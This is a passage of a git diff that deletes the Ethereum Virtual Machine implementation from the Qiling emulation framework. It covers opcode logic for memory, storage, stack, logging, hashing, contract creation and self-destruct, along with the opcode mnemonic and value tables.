constants.GAS_LOGDATA * size - topic_gas_cost = constants.GAS_LOGTOPIC * topic_count - total_gas_cost = data_gas_cost + topic_gas_cost - - computation.consume_gas( - total_gas_cost, - reason="Log topic and data gas cost", - ) - - computation.extend_memory(mem_start_position, size) - log_data = computation.memory_read_bytes(mem_start_position, size) - - computation.add_log_entry( - account=computation.msg.storage_address, - topics=topics, - data=log_data, - ) - - -log0 = functools.partial(log_XX, topic_count=0) -log1 = functools.partial(log_XX, topic_count=1) -log2 = functools.partial(log_XX, topic_count=2) -log3 = functools.partial(log_XX, topic_count=3) -log4 = functools.partial(log_XX, topic_count=4) diff --git a/qiling/arch/evm/vm/logic/memory.py b/qiling/arch/evm/vm/logic/memory.py deleted file mode 100644 index e14423fc1..000000000 --- a/qiling/arch/evm/vm/logic/memory.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ...vm.computation import BaseComputation - - -def mstore(computation: BaseComputation) -> None: - start_position = computation.stack_pop1_int() - value = computation.stack_pop1_bytes() - - padded_value = value.rjust(32, b'\x00') - normalized_value = padded_value[-32:] - - computation.extend_memory(start_position, 32) - - computation.memory_write(start_position, 32, normalized_value) - - -def mstore8(computation: BaseComputation) -> None: - start_position = computation.stack_pop1_int() - value = computation.stack_pop1_bytes() - - padded_value = value.rjust(1, b'\x00') - normalized_value = padded_value[-1:] - - computation.extend_memory(start_position, 1) - - computation.memory_write(start_position, 1, normalized_value) - - -def mload(computation: BaseComputation) -> None: - start_position = computation.stack_pop1_int() - - computation.extend_memory(start_position, 32) - - value = computation.memory_read_bytes(start_position, 32) - computation.stack_push_bytes(value) - - -def msize(computation: BaseComputation) -> None: - computation.stack_push_int(len(computation._memory)) diff --git a/qiling/arch/evm/vm/logic/sha3.py b/qiling/arch/evm/vm/logic/sha3.py deleted file mode 100644 index c27765297..000000000 --- a/qiling/arch/evm/vm/logic/sha3.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_hash.auto import keccak - -from ... import constants -from ..._utils.numeric import ( - ceil32, -) -from ...vm.computation import BaseComputation - - -def sha3(computation: BaseComputation) -> None: - start_position, size = computation.stack_pop_ints(2) - - computation.extend_memory(start_position, size) - - sha3_bytes = computation.memory_read_bytes(start_position, size) - word_count = ceil32(len(sha3_bytes)) // 32 - - gas_cost = constants.GAS_SHA3WORD * word_count - computation.consume_gas(gas_cost, reason="SHA3: word gas cost") - - result = keccak(sha3_bytes) - - computation.stack_push_bytes(result) diff --git a/qiling/arch/evm/vm/logic/stack.py b/qiling/arch/evm/vm/logic/stack.py deleted file mode 100644 index c73f4e709..000000000 --- a/qiling/arch/evm/vm/logic/stack.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools - -from ...vm.computation import BaseComputation - - -def pop(computation: BaseComputation) -> None: - computation.stack_pop1_any() - - -def push_XX(computation: BaseComputation, size: int) -> None: - raw_value = computation.code.read(size) - - # This is a performance-sensitive area. - # Calling raw_value.ljust() when size == len(raw_value) is more expensive than - # calling len(raw_value) and raw_len is typically the correct size already, - # so this saves a bit of time: - raw_len = len(raw_value) - if raw_len == size: - computation.stack_push_bytes(raw_value) - else: - padded_value = raw_value.ljust(size, b'\x00') - computation.stack_push_bytes(padded_value) - - -push1 = functools.partial(push_XX, size=1) -push2 = functools.partial(push_XX, size=2) -push3 = functools.partial(push_XX, size=3) -push4 = functools.partial(push_XX, size=4) -push5 = functools.partial(push_XX, size=5) -push6 = functools.partial(push_XX, size=6) -push7 = functools.partial(push_XX, size=7) -push8 = functools.partial(push_XX, size=8) -push9 = functools.partial(push_XX, size=9) -push10 = functools.partial(push_XX, size=10) -push11 = functools.partial(push_XX, size=11) -push12 = functools.partial(push_XX, size=12) -push13 = functools.partial(push_XX, size=13) -push14 = functools.partial(push_XX, size=14) -push15 = functools.partial(push_XX, size=15) -push16 = functools.partial(push_XX, size=16) -push17 = functools.partial(push_XX, size=17) -push18 = functools.partial(push_XX, size=18) -push19 = functools.partial(push_XX, size=19) -push20 = functools.partial(push_XX, size=20) -push21 = functools.partial(push_XX, size=21) -push22 = functools.partial(push_XX, size=22) -push23 = functools.partial(push_XX, size=23) -push24 = functools.partial(push_XX, size=24) -push25 = functools.partial(push_XX, size=25) -push26 = functools.partial(push_XX, size=26) -push27 = functools.partial(push_XX, size=27) -push28 = functools.partial(push_XX, size=28) -push29 = functools.partial(push_XX, size=29) -push30 = functools.partial(push_XX, size=30) -push31 = functools.partial(push_XX, size=31) -push32 = functools.partial(push_XX, size=32) diff --git a/qiling/arch/evm/vm/logic/storage.py b/qiling/arch/evm/vm/logic/storage.py deleted file mode 100644 index 779f28f7a..000000000 --- a/qiling/arch/evm/vm/logic/storage.py +++ /dev/null @@ -1,133 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# -from typing import NamedTuple - -from eth_utils import ( - encode_hex, -) -from ... import constants - -from ...vm.computation import BaseComputation - - -def sstore(computation: BaseComputation) -> None: - slot, value = computation.stack_pop_ints(2) - - current_value = computation.state.get_storage( - address=computation.msg.storage_address, - slot=slot, - ) - - is_currently_empty = not bool(current_value) - is_going_to_be_empty = not bool(value) - - if is_currently_empty: - gas_refund = 0 - elif is_going_to_be_empty: - gas_refund = constants.REFUND_SCLEAR - else: - gas_refund = 0 - - if is_currently_empty and is_going_to_be_empty: - gas_cost = constants.GAS_SRESET - elif is_currently_empty: - gas_cost = constants.GAS_SSET - elif is_going_to_be_empty: - gas_cost = constants.GAS_SRESET - else: - gas_cost = constants.GAS_SRESET - - computation.consume_gas( - gas_cost, reason=( - f"SSTORE: {encode_hex(computation.msg.storage_address)}" - f"[{slot}] -> {value} ({current_value})" - ) - ) - - if gas_refund: - computation.refund_gas(gas_refund) - - computation.state.set_storage( - address=computation.msg.storage_address, - slot=slot, - value=value, - ) - - -def sload(computation: BaseComputation) -> None: - slot = computation.stack_pop1_int() - - value = computation.state.get_storage( - address=computation.msg.storage_address, - slot=slot, - ) - computation.stack_push_int(value) - - -class NetSStoreGasSchedule(NamedTuple): - base: int # the gas cost when nothing changes (eg~ dirty->dirty, clean->clean, etc) - create: int # a brand new value, where none previously existed, aka init or set - update: int # a change to a value when the value was previously unchanged, aka clean, reset - remove_refund: int # the refund for removing a value, aka: clear_refund - - -def net_sstore(gas_schedule: NetSStoreGasSchedule, computation: BaseComputation) -> None: - slot, value = computation.stack_pop_ints(2) - - current_value = computation.state.get_storage( - address=computation.msg.storage_address, - slot=slot, - ) - - original_value = computation.state.get_storage( - address=computation.msg.storage_address, - slot=slot, - from_journal=False - ) - - gas_refund = 0 - - if current_value == value: - gas_cost = gas_schedule.base - else: - if original_value == current_value: - if original_value == 0: - gas_cost = gas_schedule.create - else: - gas_cost = gas_schedule.update - - if value == 0: - gas_refund += gas_schedule.remove_refund - else: - gas_cost = gas_schedule.base - - if original_value != 0: - if current_value == 0: - gas_refund -= gas_schedule.remove_refund - if value == 0: - gas_refund += gas_schedule.remove_refund - - if original_value == value: - if original_value == 0: - gas_refund += (gas_schedule.create - gas_schedule.base) - else: - gas_refund += (gas_schedule.update - gas_schedule.base) - - computation.consume_gas( - gas_cost, - reason=( - f"SSTORE: {encode_hex(computation.msg.storage_address)}" - f"[{slot}] -> {value} (current: {current_value} / original: {original_value})" - ) - ) - - if gas_refund: - computation.refund_gas(gas_refund) - - computation.state.set_storage( - address=computation.msg.storage_address, - slot=slot, - value=value, - ) diff --git a/qiling/arch/evm/vm/logic/swap.py b/qiling/arch/evm/vm/logic/swap.py deleted file mode 100644 index 68287f9a8..000000000 --- a/qiling/arch/evm/vm/logic/swap.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools - -from ...vm.computation import BaseComputation - - -def swap_XX(computation: BaseComputation, position: int) -> None: - """ - Stack item swapping - """ - computation.stack_swap(position) - - -swap1 = functools.partial(swap_XX, position=1) -swap2 = functools.partial(swap_XX, position=2) -swap3 = functools.partial(swap_XX, position=3) -swap4 = functools.partial(swap_XX, position=4) -swap5 = functools.partial(swap_XX, position=5) -swap6 = functools.partial(swap_XX, position=6) -swap7 = functools.partial(swap_XX, position=7) -swap8 = functools.partial(swap_XX, position=8) -swap9 = functools.partial(swap_XX, position=9) -swap10 = functools.partial(swap_XX, position=10) -swap11 = functools.partial(swap_XX, position=11) -swap12 = functools.partial(swap_XX, position=12) -swap13 = functools.partial(swap_XX, position=13) -swap14 = functools.partial(swap_XX, position=14) -swap15 = functools.partial(swap_XX, position=15) -swap16 = functools.partial(swap_XX, position=16) diff --git a/qiling/arch/evm/vm/logic/system.py b/qiling/arch/evm/vm/logic/system.py deleted file mode 100644 index e2a3880ba..000000000 --- a/qiling/arch/evm/vm/logic/system.py +++ /dev/null @@ -1,249 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_typing import ( - Address, -) -from eth_utils import ( - encode_hex, -) -from ... import constants -from ...exceptions import ( - Halt, - Revert, - WriteProtection, -) - -from ..._utils.address import ( - force_bytes_to_address, - generate_contract_address, - generate_safe_contract_address, -) -from ..._utils.numeric import ( - ceil32, -) -from ...abc import ( - ComputationAPI, - MessageAPI, -) -from ...vm import mnemonics -from ...vm.opcode import Opcode - -from .call import max_child_gas_eip150 - - -def return_op(computation: ComputationAPI) -> None: - start_position, size = computation.stack_pop_ints(2) - - computation.extend_memory(start_position, size) - - computation.output = computation.memory_read_bytes(start_position, size) - raise Halt('RETURN') - - -def revert(computation: ComputationAPI) -> None: - start_position, size = computation.stack_pop_ints(2) - - computation.extend_memory(start_position, size) - - computation.output = computation.memory_read_bytes(start_position, size) - raise Revert(computation.output) - - -def selfdestruct(computation: ComputationAPI) -> None: - beneficiary = force_bytes_to_address(computation.stack_pop1_bytes()) - _selfdestruct(computation, beneficiary) - - -def selfdestruct_eip150(computation: ComputationAPI) -> None: - beneficiary = force_bytes_to_address(computation.stack_pop1_bytes()) - if not computation.state.account_exists(beneficiary): - computation.consume_gas( - constants.GAS_SELFDESTRUCT_NEWACCOUNT, - reason=mnemonics.SELFDESTRUCT, - ) - _selfdestruct(computation, beneficiary) - - -def selfdestruct_eip161(computation: ComputationAPI) -> None: - beneficiary = force_bytes_to_address(computation.stack_pop1_bytes()) - is_dead = ( - not computation.state.account_exists(beneficiary) - or computation.state.account_is_empty(beneficiary) - ) - if is_dead and computation.state.get_balance(computation.msg.storage_address): - computation.consume_gas( - constants.GAS_SELFDESTRUCT_NEWACCOUNT, - reason=mnemonics.SELFDESTRUCT, - ) - _selfdestruct(computation, beneficiary) - - -def _selfdestruct(computation: ComputationAPI, beneficiary: Address) -> None: - local_balance = computation.state.get_balance(computation.msg.storage_address) - beneficiary_balance = computation.state.get_balance(beneficiary) - - # 1st: Transfer to beneficiary - computation.state.set_balance(beneficiary, local_balance + beneficiary_balance) - # 2nd: Zero the balance of the address being deleted (must come after - # sending to beneficiary in case the contract named itself as the - # beneficiary. - computation.state.set_balance(computation.msg.storage_address, 0) - - # 3rd: Register the account to be deleted - computation.register_account_for_deletion(beneficiary) - raise Halt('SELFDESTRUCT') - - -class CreateOpcodeStackData: - - def __init__(self, - endowment: int, - memory_start: int, - memory_length: int, - salt: int = None) -> None: - - self.endowment = endowment - self.memory_start = memory_start - self.memory_length = memory_length - self.salt = salt - - -class Create(Opcode): - - def max_child_gas_modifier(self, gas: int) -> int: - return gas - - def get_gas_cost(self, data: CreateOpcodeStackData) -> int: - return self.gas_cost - - def generate_contract_address(self, - stack_data: CreateOpcodeStackData, - call_data: bytes, - computation: ComputationAPI) -> Address: - - creation_nonce = computation.state.get_nonce(computation.msg.storage_address) - computation.state.increment_nonce(computation.msg.storage_address) - - contract_address = generate_contract_address( - computation.msg.storage_address, - creation_nonce, - ) - - return contract_address - - def get_stack_data(self, computation: ComputationAPI) -> CreateOpcodeStackData: - endowment, memory_start, memory_length = computation.stack_pop_ints(3) - - return CreateOpcodeStackData(endowment, memory_start, memory_length) - - def __call__(self, computation: ComputationAPI) -> None: - - stack_data = self.get_stack_data(computation) - - gas_cost = self.get_gas_cost(stack_data) - computation.consume_gas(gas_cost, reason=self.mnemonic) - - computation.extend_memory(stack_data.memory_start, stack_data.memory_length) - - insufficient_funds = computation.state.get_balance( - computation.msg.storage_address - ) < stack_data.endowment - stack_too_deep = computation.msg.depth + 1 > constants.STACK_DEPTH_LIMIT - - if insufficient_funds or stack_too_deep: - computation.stack_push_int(0) - return - - call_data = computation.memory_read_bytes( - stack_data.memory_start, stack_data.memory_length - ) - - create_msg_gas = self.max_child_gas_modifier( - computation.get_gas_remaining() - ) - computation.consume_gas(create_msg_gas, reason=self.mnemonic) - - contract_address = self.generate_contract_address(stack_data, call_data, computation) - - is_collision = computation.state.has_code_or_nonce(contract_address) - - if is_collision: - computation.stack_push_int(0) - return - - child_msg = computation.prepare_child_message( - gas=create_msg_gas, - to=constants.CREATE_CONTRACT_ADDRESS, - value=stack_data.endowment, - data=b'', - code=call_data, - create_address=contract_address, - ) - self.apply_create_message(computation, child_msg) - - def apply_create_message(self, computation: ComputationAPI, child_msg: MessageAPI) -> None: - child_computation = computation.apply_child_computation(child_msg) - - if child_computation.is_error: - computation.stack_push_int(0) - else: - computation.stack_push_bytes(child_msg.storage_address) - - computation.return_gas(child_computation.get_gas_remaining()) - - -class CreateEIP150(Create): - def max_child_gas_modifier(self, gas: int) -> int: - return max_child_gas_eip150(gas) - - -class CreateByzantium(CreateEIP150): - def __call__(self, computation: ComputationAPI) -> None: - if computation.msg.is_static: - raise WriteProtection("Cannot modify state while inside of a STATICCALL context") - return super().__call__(computation) - - -class Create2(CreateByzantium): - - def get_stack_data(self, computation: ComputationAPI) -> CreateOpcodeStackData: - endowment, memory_start, memory_length, salt = computation.stack_pop_ints(4) - - return CreateOpcodeStackData(endowment, memory_start, memory_length, salt) - - def get_gas_cost(self, data: CreateOpcodeStackData) -> int: - return constants.GAS_CREATE + constants.GAS_SHA3WORD * ceil32(data.memory_length) // 32 - - def generate_contract_address(self, - stack_data: CreateOpcodeStackData, - call_data: bytes, - computation: ComputationAPI) -> Address: - - computation.state.increment_nonce(computation.msg.storage_address) - return generate_safe_contract_address( - computation.msg.storage_address, - stack_data.salt, - call_data - ) - - def apply_create_message(self, computation: ComputationAPI, child_msg: MessageAPI) -> None: - # We need to ensure that creation operates on empty storage **and** - # that if the initialization code fails that we revert the account back - # to its original state root. - snapshot = computation.state.snapshot() - - computation.state.delete_storage(child_msg.storage_address) - - child_computation = computation.apply_child_computation(child_msg) - - if child_computation.is_error: - computation.state.revert(snapshot) - computation.stack_push_int(0) - else: - computation.state.commit(snapshot) - computation.stack_push_bytes(child_msg.storage_address) - - computation.return_gas(child_computation.get_gas_remaining()) diff --git a/qiling/arch/evm/vm/memory.py b/qiling/arch/evm/vm/memory.py deleted file mode 100644 index 882bda278..000000000 --- a/qiling/arch/evm/vm/memory.py +++ /dev/null @@ -1,67 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import itertools -import logging - -from ..validation import ( - validate_is_bytes, - validate_length, - validate_lte, - validate_uint256, -) - -from .._utils.numeric import ( - ceil32, -) -from ..abc import MemoryAPI - - -class Memory(MemoryAPI): - __slots__ = ['_bytes'] - logger = logging.getLogger('eth.vm.memory.Memory') - - def __init__(self) -> None: - self._bytes = bytearray() - - def extend(self, start_position: int, size: int) -> None: - if size == 0: - return - - new_size = ceil32(start_position + size) - if new_size <= len(self): - return - - size_to_extend = new_size - len(self) - try: - self._bytes.extend(itertools.repeat(0, size_to_extend)) - except BufferError: - # we can't extend the buffer (which might involve relocating it) if a - # memoryview (which stores a pointer into the buffer) has been created by - # read() and not released. Callers of read() will never try to write to the - # buffer so we're not missing anything by making a new buffer and forgetting - # about the old one. We're keeping too much memory around but this is still a - # net savings over having read() return a new bytes() object every time. - self._bytes = self._bytes + bytearray(size_to_extend) - - def __len__(self) -> int: - return len(self._bytes) - - def write(self, start_position: int, size: int, value: bytes) -> None: - if size: - validate_uint256(start_position) - validate_uint256(size) - validate_is_bytes(value) - validate_length(value, length=size) - validate_lte(start_position + size, maximum=len(self)) - - for idx, v in enumerate(value): - self._bytes[start_position + idx] = v - - def read(self, start_position: int, size: int) -> memoryview: - return memoryview(self._bytes)[start_position:start_position + size] - - def read_bytes(self, start_position: int, size: int) -> bytes: - return bytes(self._bytes[start_position:start_position + size]) diff --git a/qiling/arch/evm/vm/message.py b/qiling/arch/evm/vm/message.py deleted file mode 100644 index 55e044de5..000000000 --- a/qiling/arch/evm/vm/message.py +++ /dev/null @@ -1,116 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import logging - -from eth_typing import Address - -from ..abc import MessageAPI -from ..constants import ( - CREATE_CONTRACT_ADDRESS, -) -from ..typing import ( - BytesOrView, -) -from ..validation import ( - validate_canonical_address, - validate_is_bytes, - validate_is_bytes_or_view, - validate_is_integer, - validate_gte, - validate_uint256, - validate_is_boolean, -) - - -class Message(MessageAPI): - __slots__ = [ - 'to', 'sender', 'value', 'data', 'depth', 'gas', 'code', '_code_address', - 'create_address', 'should_transfer_value', 'is_static', '_storage_address', 'gas_price' - ] - - logger = logging.getLogger('eth.vm.message.Message') - - def __init__(self, - gas: int, - to: Address, - sender: Address, - value: int, - data: BytesOrView, - code: bytes, - depth: int = 0, - create_address: Address = None, - code_address: Address = None, - should_transfer_value: bool = True, - is_static: bool = False, - gas_price: int = 1) -> None: - validate_uint256(gas, title="Message.gas") - self.gas: int = gas - - if to != CREATE_CONTRACT_ADDRESS: - validate_canonical_address(to, title="Message.to") - self.to = to - - validate_canonical_address(sender, title="Message.sender") - self.sender = sender - - validate_uint256(value, title="Message.value") - self.value = value - - validate_is_bytes_or_view(data, title="Message.data") - self.data = data - - validate_is_integer(depth, title="Message.depth") - validate_gte(depth, minimum=0, title="Message.depth") - self.depth = depth - - validate_is_bytes(code, title="Message.code") - self.code = code - - if create_address is not None: - validate_canonical_address(create_address, title="Message.storage_address") - self.storage_address = create_address - - if code_address is not None: - validate_canonical_address(code_address, title="Message.code_address") - self.code_address = code_address - - validate_is_boolean(should_transfer_value, title="Message.should_transfer_value") - self.should_transfer_value = should_transfer_value - - validate_is_boolean(is_static, title="Message.is_static") - self.is_static = is_static - - self.gas_price = gas_price - - @property - def code_address(self) -> Address: - if self._code_address is not None: - return self._code_address - else: - return self.to - - @code_address.setter - def code_address(self, value: Address) -> None: - self._code_address = value - - @property - def storage_address(self) -> Address: - if self._storage_address is not None: - return self._storage_address - else: - return self.to - - @storage_address.setter - def storage_address(self, value: Address) -> None: - self._storage_address = value - - @property - def is_create(self) -> bool: - return self.to == CREATE_CONTRACT_ADDRESS - - @property - def data_as_bytes(self) -> bytes: - return bytes(self.data) diff --git a/qiling/arch/evm/vm/mnemonics.py b/qiling/arch/evm/vm/mnemonics.py deleted file mode 100644 index ecd5d48bc..000000000 --- a/qiling/arch/evm/vm/mnemonics.py +++ /dev/null @@ -1,174 +0,0 @@ -# -# Arithmetic -# -STOP = 'STOP' -ADD = 'ADD' -MUL = 'MUL' -SUB = 'SUB' -DIV = 'DIV' -SDIV = 'SDIV' -MOD = 'MOD' -SMOD = 'SMOD' -ADDMOD = 'ADDMOD' -MULMOD = 'MULMOD' -EXP = 'EXP' -SIGNEXTEND = 'SIGNEXTEND' -SHL = 'SHL' -SHR = 'SHR' -SAR = 'SAR' -# -# Comparisons -# -LT = 'LT' -GT = 'GT' -SLT = 'SLT' -SGT = 'SGT' -EQ = 'EQ' -ISZERO = 'ISZERO' -AND = 'AND' -OR = 'OR' -XOR = 'XOR' -NOT = 'NOT' -BYTE = 'BYTE' -# -# Sha3 -# -SHA3 = 'SHA3' -# -# Environment Information -# -ADDRESS = 'ADDRESS' -BALANCE = 'BALANCE' -SELFBALANCE = 'SELFBALANCE' -ORIGIN = 'ORIGIN' -CALLER = 'CALLER' -CALLVALUE = 'CALLVALUE' -CALLDATALOAD = 'CALLDATALOAD' -CALLDATASIZE = 'CALLDATASIZE' -CALLDATACOPY = 'CALLDATACOPY' -CODESIZE = 'CODESIZE' -CODECOPY = 'CODECOPY' -GASPRICE = 'GASPRICE' -EXTCODESIZE = 'EXTCODESIZE' -EXTCODECOPY = 'EXTCODECOPY' -EXTCODEHASH = 'EXTCODEHASH' -RETURNDATASIZE = 'RETURNDATASIZE' -RETURNDATACOPY = 'RETURNDATACOPY' -CHAINID = 'CHAINID' -# -# Block Information -# -BLOCKHASH = 'BLOCKHASH' -COINBASE = 'COINBASE' -TIMESTAMP = 'TIMESTAMP' -NUMBER = 'NUMBER' -DIFFICULTY = 'DIFFICULTY' -GASLIMIT = 'GASLIMIT' -# -# Stack, Memory, Storage and Flow Operations -# -POP = 'POP' -MLOAD = 'MLOAD' -MSTORE = 'MSTORE' -MSTORE8 = 'MSTORE8' -SLOAD = 'SLOAD' -SSTORE = 'SSTORE' -JUMP = 'JUMP' -JUMPI = 'JUMPI' -PC = 'PC' -MSIZE = 'MSIZE' -GAS = 'GAS' -JUMPDEST = 'JUMPDEST' -REVERT = 'REVERT' -# -# Push Operations -# -PUSH1 = 'PUSH1' -PUSH2 = 'PUSH2' -PUSH3 = 'PUSH3' -PUSH4 = 'PUSH4' -PUSH5 = 'PUSH5' -PUSH6 = 'PUSH6' -PUSH7 = 'PUSH7' -PUSH8 = 'PUSH8' -PUSH9 = 'PUSH9' -PUSH10 = 'PUSH10' -PUSH11 = 'PUSH11' -PUSH12 = 'PUSH12' -PUSH13 = 'PUSH13' -PUSH14 = 'PUSH14' -PUSH15 = 'PUSH15' -PUSH16 = 'PUSH16' -PUSH17 = 'PUSH17' -PUSH18 = 'PUSH18' -PUSH19 = 'PUSH19' -PUSH20 = 'PUSH20' -PUSH21 = 'PUSH21' -PUSH22 = 'PUSH22' -PUSH23 = 'PUSH23' -PUSH24 = 'PUSH24' -PUSH25 = 'PUSH25' -PUSH26 = 'PUSH26' -PUSH27 = 'PUSH27' -PUSH28 = 'PUSH28' -PUSH29 = 'PUSH29' -PUSH30 = 'PUSH30' -PUSH31 = 'PUSH31' -PUSH32 = 'PUSH32' -# -# Duplicate Operations -# -DUP1 = 'DUP1' -DUP2 = 'DUP2' -DUP3 = 'DUP3' -DUP4 = 'DUP4' -DUP5 = 'DUP5' -DUP6 = 'DUP6' -DUP7 = 'DUP7' -DUP8 = 'DUP8' -DUP9 = 'DUP9' -DUP10 = 'DUP10' -DUP11 = 'DUP11' -DUP12 = 'DUP12' -DUP13 = 'DUP13' -DUP14 = 'DUP14' -DUP15 = 'DUP15' -DUP16 = 'DUP16' -# -# Exchange Operations -# -SWAP1 = 'SWAP1' -SWAP2 = 'SWAP2' -SWAP3 = 'SWAP3' -SWAP4 = 'SWAP4' -SWAP5 = 'SWAP5' -SWAP6 = 'SWAP6' -SWAP7 = 'SWAP7' -SWAP8 = 'SWAP8' -SWAP9 = 'SWAP9' -SWAP10 = 'SWAP10' -SWAP11 = 'SWAP11' -SWAP12 = 'SWAP12' -SWAP13 = 'SWAP13' -SWAP14 = 'SWAP14' -SWAP15 = 'SWAP15' -SWAP16 = 'SWAP16' -# -# Logging -# -LOG0 = 'LOG0' -LOG1 = 'LOG1' -LOG2 = 'LOG2' -LOG3 = 'LOG3' -LOG4 = 'LOG4' -# -# System -# -CREATE = 'CREATE' -CREATE2 = 'CREATE2' -CALL = 'CALL' -CALLCODE = 'CALLCODE' -STATICCALL = 'STATICCALL' -RETURN = 'RETURN' -DELEGATECALL = 'DELEGATECALL' -SELFDESTRUCT = 'SELFDESTRUCT' diff --git a/qiling/arch/evm/vm/opcode.py b/qiling/arch/evm/vm/opcode.py deleted file mode 100644 index e21d536e5..000000000 --- a/qiling/arch/evm/vm/opcode.py +++ /dev/null @@ -1,79 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools - -from typing import ( - Any, - Callable, - Type, - TypeVar, -) - -from eth_utils import ( - ExtendedDebugLogger, - get_extended_debug_logger, -) - -from .._utils.datatypes import Configurable -from ..abc import ( - ComputationAPI, - OpcodeAPI, -) - - -T = TypeVar('T') - - -class Opcode(Configurable, OpcodeAPI): - mnemonic: str = None - gas_cost: int = None - - def __init__(self) -> None: - if self.mnemonic is None: - raise TypeError(f"Opcode class {type(self)} missing opcode mnemonic") - if self.gas_cost is None: - raise TypeError(f"Opcode class {type(self)} missing opcode gas_cost") - - @property - def logger(self) -> ExtendedDebugLogger: - return get_extended_debug_logger(f'eth.vm.logic.{self.mnemonic}') - - @classmethod - def as_opcode(cls: Type[T], - logic_fn: Callable[..., Any], - mnemonic: str, - gas_cost: int) -> T: - if gas_cost: - @functools.wraps(logic_fn) - def wrapped_logic_fn(computation: ComputationAPI) -> Any: - """ - Wrapper functionf or the logic function which consumes the base - opcode gas cost prior to execution. - """ - computation.consume_gas( - gas_cost, - mnemonic, - ) - return logic_fn(computation) - else: - wrapped_logic_fn = logic_fn - - props = { - '__call__': staticmethod(wrapped_logic_fn), - 'mnemonic': mnemonic, - 'gas_cost': gas_cost, - } - opcode_cls = type(f"opcode:{mnemonic}", (cls,), props) - return opcode_cls() - - def __copy__(self) -> 'Opcode': - return type(self)() - - def __deepcopy__(self, memo: Any) -> 'Opcode': - return type(self)() - - -as_opcode = Opcode.as_opcode diff --git a/qiling/arch/evm/vm/opcode_values.py b/qiling/arch/evm/vm/opcode_values.py deleted file mode 100644 index cd474039a..000000000 --- a/qiling/arch/evm/vm/opcode_values.py +++ /dev/null @@ -1,196 +0,0 @@ -# -# Stop and Arithmetic -# -STOP = 0x00 -ADD = 0x01 -MUL = 0x02 -SUB = 0x03 -DIV = 0x04 -SDIV = 0x05 -MOD = 0x06 -SMOD = 0x07 -ADDMOD = 0x08 -MULMOD = 0x09 -EXP = 0x0a -SIGNEXTEND = 0x0b - - -# -# Comparison and Bitwise Logic -# -LT = 0x10 -GT = 0x11 -SLT = 0x12 -SGT = 0x13 -EQ = 0x14 -ISZERO = 0x15 -AND = 0x16 -OR = 0x17 -XOR = 0x18 -NOT = 0x19 -BYTE = 0x1a -SHL = 0x1b -SHR = 0x1c -SAR = 0x1d - - -# -# Sha3 -# -SHA3 = 0x20 - - -# -# Environment Information -# -ADDRESS = 0x30 -BALANCE = 0x31 -ORIGIN = 0x32 -CALLER = 0x33 -CALLVALUE = 0x34 -CALLDATALOAD = 0x35 -CALLDATASIZE = 0x36 -CALLDATACOPY = 0x37 -CODESIZE = 0x38 -CODECOPY = 0x39 -GASPRICE = 0x3a -EXTCODESIZE = 0x3b -EXTCODECOPY = 0x3c -RETURNDATASIZE = 0x3d -RETURNDATACOPY = 0x3e -EXTCODEHASH = 0x3f - -# These opcodes seem to belong in the environment block, but we are out of opcode space in 0x3* -CHAINID = 0x46 -SELFBALANCE = 0x47 - -# -# Block Information -# -BLOCKHASH = 0x40 -COINBASE = 0x41 -TIMESTAMP = 0x42 -NUMBER = 0x43 -DIFFICULTY = 0x44 -GASLIMIT = 0x45 - - -# -# Stack, Memory, Storage and Flow Operations -# -POP = 0x50 - -MLOAD = 0x51 -MSTORE = 0x52 -MSTORE8 = 0x53 -SLOAD = 0x54 -SSTORE = 0x55 -JUMP = 0x56 -JUMPI = 0x57 -PC = 0x58 -MSIZE = 0x59 -GAS = 0x5a -JUMPDEST = 0x5b - - -# -# Push Operations -# -PUSH1 = 0x60 -PUSH2 = 0x61 -PUSH3 = 0x62 -PUSH4 = 0x63 -PUSH5 = 0x64 -PUSH6 = 0x65 -PUSH7 = 0x66 -PUSH8 = 0x67 -PUSH9 = 0x68 -PUSH10 = 0x69 -PUSH11 = 0x6a -PUSH12 = 0x6b -PUSH13 = 0x6c -PUSH14 = 0x6d -PUSH15 = 0x6e -PUSH16 = 0x6f -PUSH17 = 0x70 -PUSH18 = 0x71 -PUSH19 = 0x72 -PUSH20 = 0x73 -PUSH21 = 0x74 -PUSH22 = 0x75 -PUSH23 = 0x76 -PUSH24 = 0x77 -PUSH25 = 0x78 -PUSH26 = 0x79 -PUSH27 = 0x7a -PUSH28 = 0x7b -PUSH29 = 0x7c -PUSH30 = 0x7d -PUSH31 = 0x7e -PUSH32 = 0x7f - - -# -# Duplicate Operations -# -DUP1 = 0x80 -DUP2 = 0x81 -DUP3 = 0x82 -DUP4 = 0x83 -DUP5 = 0x84 -DUP6 = 0x85 -DUP7 = 0x86 -DUP8 = 0x87 -DUP9 = 0x88 -DUP10 = 0x89 -DUP11 = 0x8a -DUP12 = 0x8b -DUP13 = 0x8c -DUP14 = 0x8d -DUP15 = 0x8e -DUP16 = 0x8f - - -# -# Exchange Operations -# -SWAP1 = 0x90 -SWAP2 = 0x91 -SWAP3 = 0x92 -SWAP4 = 0x93 -SWAP5 = 0x94 -SWAP6 = 0x95 -SWAP7 = 0x96 -SWAP8 = 0x97 -SWAP9 = 0x98 -SWAP10 = 0x99 -SWAP11 = 0x9a -SWAP12 = 0x9b -SWAP13 = 0x9c -SWAP14 = 0x9d -SWAP15 = 0x9e -SWAP16 = 0x9f - - -# -# Logging -# -LOG0 = 0xa0 -LOG1 = 0xa1 -LOG2 = 0xa2 -LOG3 = 0xa3 -LOG4 = 0xa4 - - -# -# System -# -CREATE = 0xf0 -CALL = 0xf1 -CALLCODE = 0xf2 -RETURN = 0xf3 